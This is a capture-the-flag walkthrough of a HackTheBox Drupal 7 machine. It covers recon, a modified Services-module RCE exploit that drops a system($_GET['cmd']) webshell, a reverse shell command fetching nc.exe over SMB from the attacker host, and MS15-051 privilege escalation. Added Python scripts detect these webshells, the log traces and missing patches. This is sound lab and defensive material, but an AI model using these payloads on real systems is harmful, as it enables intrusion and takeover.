A medium box from HackTheBox: use a vulnerability in a Drupal plugin to get initial access, then a kernel exploit for privesc.

Recon

Regular nmap

sudo nmap -sC -sV -oA nmap/init 10.10.10.9
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On port 80 there is a Drupal instance, running Drupal 7 (nmap's http-generator script already reports it)

Next up, gobuster for directories

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --url http://10.10.10.9

Don't find anything interesting immediately, but the presence of /rest/ will be important later

Then gobuster for files

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --url http://10.10.10.9

And find /changelog.txt in the webroot, which reveals the exact Drupal version: 7.54

For a more specific scan, run droopescan to enumerate the plugins installed on the server

droopescan scan drupal -u 10.10.10.9

This one takes ages to complete (just under 36 minutes), but eventually get the output

[+] Themes found:
    seven http://10.10.10.9/themes/seven/
    garland http://10.10.10.9/themes/garland/

[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.9/CHANGELOG.txt
    Default admin - http://10.10.10.9/user/login

[+] Possible version(s):
    7.54

[+] Plugins found:
    ctools http://10.10.10.9/sites/all/modules/ctools/
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/ctools/changelog.txt
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
        http://10.10.10.9/sites/all/modules/ctools/API.txt
    libraries http://10.10.10.9/sites/all/modules/libraries/
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/libraries/changelog.txt
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/libraries/README.txt
        http://10.10.10.9/sites/all/modules/libraries/readme.txt
        http://10.10.10.9/sites/all/modules/libraries/README.TXT
        http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
    services http://10.10.10.9/sites/all/modules/services/
        http://10.10.10.9/sites/all/modules/services/README.txt
        http://10.10.10.9/sites/all/modules/services/readme.txt
        http://10.10.10.9/sites/all/modules/services/README.TXT
        http://10.10.10.9/sites/all/modules/services/LICENSE.txt
    image http://10.10.10.9/modules/image/
    profile http://10.10.10.9/modules/profile/
    php http://10.10.10.9/modules/php/

[+] Scan finished (0:35:53.627982 elapsed)

Then, running searchsploit against drupal, see an exploit involving Drupal 7.x and the services plugin

searchsploit drupal 7

...

Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php

...

Exploitation

Download the exploit to the current directory

searchsploit -m php/webapps/41564.php

Firing it immediately, it doesn't work with -h or when giving it a target, so read up on it using the writeup link inside the file

At the end of the writeup, the authors write - “…one has to guess or find the endpoint URL, which mitigates the vulnerability a bit”

So inside the file, change the endpoint variable from “endpoint_path=/rest_endpoint” to the one found in the gobuster enumeration, “endpoint_path=/rest”

Since the exploit writes a file to the webroot, can change the default PHP file it drops to a webshell

Changing

$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];

To

$file = [
    'filename' => 'rev.php',
    'data' => '<?php system($_GET[\'cmd\']); ?>'
];

Then change the target IP within the file as well

$url = 'http://10.10.10.9';

Then fire the exploit with

php 41564.php
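The two PHP payloads above are exactly the artefacts a defender would look for on the IIS host after this kind of attack. The scanner below is an added example, not code from this writeup or from the exploit: it matches the eval-over-php://input dropper and the system($_GET[...]) webshell shape against PHP files under a webroot. The sample files are constructed here, and the names scan_php_source, scan_webroot and scan_samples are this example's own.

```python
import os
import re
from typing import Dict, List

# Signatures for the two webshell shapes in the writeup: eval() over the raw POST body
# (the exploit's default dropper) and a shell function fed straight from a request parameter.
WEBSHELL_SIGNATURES = {
    "eval_php_input": re.compile(
        r"eval\s*\(\s*file_get_contents\s*\(\s*['\"]php://input", re.IGNORECASE
    ),
    "shell_from_request": re.compile(
        r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(\s*"
        r"\$_(GET|POST|REQUEST|COOKIE)\b",
        re.IGNORECASE,
    ),
}


def scan_php_source(source: str) -> List[str]:
    """Return the names of every webshell signature that matches this PHP source."""
    return [name for name, rx in WEBSHELL_SIGNATURES.items() if rx.search(source)]


def scan_webroot(root: str) -> Dict[str, List[str]]:
    """Walk a webroot and map each matching .php file (relative path) to its hits."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if not filename.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, filename)
            try:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    hits = scan_php_source(handle.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


# Constructed sample files (not taken from the target): the exploit's default dropper,
# the GET-parameter webshell from the writeup, and a benign Drupal-style front controller.
SAMPLE_FILES = {
    "dixuSOspsOUU.php": "<?php eval(file_get_contents('php://input')); ?>",
    "rev.php": "<?php system($_GET['cmd']); ?>",
    "index.php": (
        "<?php\n"
        "define('DRUPAL_ROOT', getcwd());\n"
        "require_once DRUPAL_ROOT . '/includes/bootstrap.inc';\n"
    ),
}


def scan_samples(samples: Dict[str, str] = SAMPLE_FILES) -> Dict[str, List[str]]:
    """Run the signatures over in-memory sources; same result shape as scan_webroot."""
    findings: Dict[str, List[str]] = {}
    for name, source in samples.items():
        hits = scan_php_source(source)
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    import sys

    # With a path argument, sweep a real webroot; otherwise run over the constructed samples.
    results = scan_webroot(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for path, hits in sorted(results.items()):
        print(f"{path}: {', '.join(hits)}")
```

Signature matching is deliberately narrow so it can run on every deploy or as a scheduled job with few false positives; pairing it with a file-creation watch on the webroot (a new .php file appearing outside a release is itself the anomaly) covers shells that do not use these exact shapes.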

Now with the webshell, can use the Windows version of netcat, nc.exe, to get a reverse shell

Copy nc.exe to the working directory, then use impacket's smbserver.py to share it so the target can reach it over SMB via the webshell

/opt/impacket/examples/smbserver.py share .

And then use the webshell to get a reverse shell by setting up a netcat listener on port 4444 and going to

http://10.10.10.9/rev.php?cmd=\\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444

The listener catches the reverse shell, and from there grab the user flag
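From the IIS side, the webshell requests above leave a distinctive trail in the W3C logs: a GET to a PHP file with a cmd= query that decodes to a UNC path, nc.exe or cmd.exe. The detection below is an added example, not part of this writeup; the log excerpt is constructed to mirror the requests described above, and the helper names parse_w3c, suspicious_requests and scan_log_text are this example's own.

```python
import urllib.parse
from typing import Dict, List

# Constructed IIS W3C log excerpt (not captured from the target): a normal Drupal page
# load, the webshell pulling nc.exe over SMB and spawning a reverse shell, and a whoami.
# The field layout is the default IIS 7.5 W3C selection.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2017-03-15 10:01:02 10.10.10.9 GET /node/1 - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 120
2017-03-15 10:03:44 10.10.10.9 GET /rev.php cmd=%5C%5C10.10.14.2%5Cshare%5Cnc.exe+-e+cmd.exe+10.10.14.2+4444 80 - 10.10.14.2 Mozilla/5.0 200 0 0 3500
2017-03-15 10:03:50 10.10.10.9 GET /rev.php cmd=whoami 80 - 10.10.14.2 Mozilla/5.0 200 0 0 40
"""

# Substrings in a decoded query value that point at OS command execution through a web
# parameter. Matched case-insensitively; the two-backslash entry catches UNC paths such
# as \\host\share\nc.exe, and " -e " the netcat execute flag.
COMMAND_INDICATORS = ("nc.exe", "cmd.exe", "powershell", "whoami", "\\\\", " -e ")


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C extended log text into one {field: value} dict per request line."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # directives may re-declare fields mid-file
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def suspicious_requests(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the requests whose decoded query parameters carry a command-like value."""
    hits: List[Dict[str, str]] = []
    for row in rows:
        query = row.get("cs-uri-query", "-")
        if query == "-":  # IIS writes "-" for an empty field
            continue
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                lowered = value.lower()
                matched = [ind for ind in COMMAND_INDICATORS if ind.lower() in lowered]
                if matched:
                    hits.append({
                        "time": f"{row['date']} {row['time']}",
                        "client": row["c-ip"],
                        "uri": row["cs-uri-stem"],
                        "param": name,
                        "value": value,
                        "indicators": ",".join(matched),
                    })
    return hits


def scan_log_text(text: str = SAMPLE_IIS_LOG) -> List[Dict[str, str]]:
    """Parse and scan a whole log in one call."""
    return suspicious_requests(parse_w3c(text))


if __name__ == "__main__":
    for hit in scan_log_text():
        print(f"{hit['time']} {hit['client']} {hit['uri']} "
              f"{hit['param']}={hit['value']!r} [{hit['indicators']}]")
```

Decoding the query before matching matters: the UNC backslashes arrive as %5C and the spaces as +, so a rule keyed on the raw cs-uri-query column would miss the nc.exe fetch entirely. The same parser runs unchanged over real IIS logs because it takes its column order from the #Fields directive instead of hard-coding it.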

Now on the box, run systeminfo and see that there are no hotfixes applied, so a kernel exploit should be easy

I'll opt to use MS15-051, since it's easy and has an executable ready to go off GitHub

Transfer it to the victim via the SMB server again, then run it with cmd.exe as the command to execute, which gives a shell as nt authority\system - root!

C:\inetpub\drupal-7.54> exploit.exe cmd.exe

C:\inetpub\drupal-7.54> whoami
nt authority\system
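The systeminfo observation above is also the defender's cheapest check: a host whose Hotfix(s) line reads N/A has never had an update applied, and a list of installed KBs can be compared against the ones that close known kernel bugs. The script below is an added example, not from this writeup; both systeminfo excerpts are constructed, and the mapping of KB3045171 to MS15-051 plus the helper names hotfix_summary, installed_hotfixes, missing_hotfixes and assess are this example's own.

```python
import re
from typing import Dict, Optional, Set

# Constructed systeminfo excerpts (not output captured from the target): an unpatched
# host whose Hotfix(s) line reads N/A, and a host with a couple of updates installed.
UNPATCHED_SYSTEMINFO = """\
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

PATCHED_SYSTEMINFO = """\
Host Name:                 WEB02
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3045171
                           [02]: KB4012212
Network Card(s):           1 NIC(s) Installed.
"""

# Updates whose absence this check reports, keyed by KB with the bulletin name for the
# report. KB3045171 is the MS15-051 kernel-mode driver fix (assumed mapping for this example).
REQUIRED_KBS: Dict[str, str] = {"KB3045171": "MS15-051"}

HOTFIX_LINE_RE = re.compile(r"^Hotfix\(s\):\s*(.+?)\s*$", re.MULTILINE)
KB_ENTRY_RE = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.MULTILINE)
HOST_RE = re.compile(r"^Host Name:\s*(\S+)", re.MULTILINE)


def hotfix_summary(systeminfo_text: str) -> Optional[str]:
    """Return the text after 'Hotfix(s):' ('N/A' or '2 Hotfix(s) Installed.'), or None."""
    match = HOTFIX_LINE_RE.search(systeminfo_text)
    return match.group(1) if match else None


def installed_hotfixes(systeminfo_text: str) -> Set[str]:
    """Return the KB identifiers listed under Hotfix(s)."""
    return set(KB_ENTRY_RE.findall(systeminfo_text))


def missing_hotfixes(systeminfo_text: str,
                     required: Dict[str, str] = REQUIRED_KBS) -> Dict[str, str]:
    """Return {KB: bulletin} for every required update not present on the host."""
    installed = installed_hotfixes(systeminfo_text)
    return {kb: bulletin for kb, bulletin in required.items() if kb not in installed}


def assess(systeminfo_text: str) -> Dict[str, object]:
    """Bundle host name, never-patched flag, installed KBs and gaps into one report."""
    host = HOST_RE.search(systeminfo_text)
    summary = hotfix_summary(systeminfo_text)
    return {
        "host": host.group(1) if host else "?",
        "never_patched": summary is None or summary.upper() == "N/A",
        "installed": sorted(installed_hotfixes(systeminfo_text)),
        "missing": missing_hotfixes(systeminfo_text),
    }


if __name__ == "__main__":
    for text in (UNPATCHED_SYSTEMINFO, PATCHED_SYSTEMINFO):
        report = assess(text)
        print(f"{report['host']}: never_patched={report['never_patched']} "
              f"installed={len(report['installed'])} missing={report['missing']}")
```

Feeding the saved output of systeminfo from each server into assess gives a quick fleet-wide view of which hosts have a kernel still open to this class of local privilege escalation; a "never_patched" result on an internet-facing IIS box is the finding to act on first.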